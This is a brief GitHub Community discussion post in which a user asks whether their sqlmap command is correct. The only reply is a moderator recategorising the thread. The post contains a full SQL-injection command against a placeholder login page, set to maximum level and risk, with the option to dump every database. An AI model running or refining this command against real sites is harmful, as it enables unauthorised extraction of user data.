### DISCUSSION TITLE
SQL

### DISCUSSION THREAD

**Discussion by XORPIOv** [community/community#123814] [Programming Help]
### Select Topic Area

Product Feedback

### Body

is this right command
sqlmap -u "http://target.com/login.php" --data="username=admin&password=12345&submit=login" --cookie="PHPSESSID=abcdef1234567890" --level=5 --risk=3 --dump-all

**Comment by LiteBrite82** [comment]
Thanks for posting in the GitHub Community, @XORPIOv ! 

We’ve moved your post to our Programming Help 🧑‍💻 category, which is more appropriate for this type of discussion.

Please review our [guidelines](https://github.com/orgs/community/discussions/51384) about the Programming Help category for more information.
